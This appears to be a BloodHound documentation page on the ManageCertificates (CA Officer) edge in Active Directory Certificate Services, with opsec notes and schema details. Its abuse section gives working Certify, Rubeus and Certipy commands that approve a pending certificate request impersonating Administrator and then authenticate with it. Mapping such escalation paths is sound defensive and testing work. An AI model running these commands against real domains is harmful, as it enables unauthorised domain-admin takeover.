> ## Documentation Index
> Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt
> Use this file to discover all available pages before exploring further.

# ManageCertificates

> The principal has the "Manage Certificates", also known as "CA Officer", permission on the Enterprise CA.

<img noZoom src="https://mintcdn.com/specterops/tTIczgde9H07oLXf/assets/enterprise-AND-community-edition-pill-tag.svg?fit=max&auto=format&n=tTIczgde9H07oLXf&q=85&s=ad49a576589f4d2a8081df77d07fdf56" alt="Applies to BloodHound Enterprise and CE" width="482" height="45" data-path="assets/enterprise-AND-community-edition-pill-tag.svg" />

This permission allows the principal to approve certificate requests that require manager approval and to modify certain properties (e.g., adding extensions to pending certificates). It does not by itself guarantee a privilege escalation but often removes a final barrier (manager approval) in ADCS abuse paths.

## Abuse Info

An attacker can identify ADCS escalation opportunities where manager approval on a template prevents direct abuse, but leverage the Certificate Manager role to approve the pending request. Alternatively, the role can be abused to add an extension to pending certificates (e.g., to insert a group-linked issuance policy in environments using Authentication Mechanism Assurance (AMA)). See [Certify wiki - Escalation Techniques - ManageCertificates](https://github.com/GhostPack/Certify/wiki/4-%E2%80%90-Escalation-Techniques#managecertificates) for details.

### Windows

Request a certificate that requires manager approval (example ESC1 scenario):

```cmd theme={null}
Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template CustomUser --upn Administrator --sid S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX-500
```

Note the printed private key and request ID. Approve the certificate:

```cmd theme={null}
Certify.exe manage-ca --ca ca01.corp.local\CORP-CA01-CA --issue-id 1337
```

Download the issued certificate with the embedded private key (Base64 PFX):

```cmd theme={null}
Certify.exe request-download --ca ca01.corp.local\CORP-CA01-CA --id 1337 --private-key <Base64PrivateKey>
```

Authenticate using the certificate (Rubeus example):

```cmd theme={null}
Rubeus.exe asktgt /user:Administrator /certificate:<Base64PFX> /ptt
```

### Linux

Approve a pending request:

```bash theme={null}
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password 'Passw0rd'
```

Retrieve the issued certificate:

```bash theme={null}
certipy req -username john@corp.local -password 'Passw0rd' -ca corp-DC-CA -target ca.corp.local -retrieve 785
```

## Opsec Considerations

Approving requests generates issuance events and stores issued certificates on the CA host. Repeated approvals or unusual patterns (e.g., high-value templates) may be monitored. Added extensions or policy changes may be auditable depending on CA logging configuration.

## Edge Schema

Source: [User](/resources/nodes/user), [Group](/resources/nodes/group), [Computer](/resources/nodes/computer)\
Destination: [EnterpriseCA](/resources/nodes/enterprise-ca)\
Traversable: **Yes**

## References

This edge is related to the following MITRE ATT\&CK tactic and techniques:

* [T1649: Steal or Forge Authentication Certificates](https://attack.mitre.org/techniques/T1649/)

### Abuse and Opsec references

* [Certified Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)
* [Certify wiki - Escalation Techniques - ManageCertificates](https://github.com/GhostPack/Certify/wiki/4-%E2%80%90-Escalation-Techniques#managecertificates)
* [ESC7: Dangerous Permissions on CA (Certipy wiki)](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc7-dangerous-permissions-on-ca)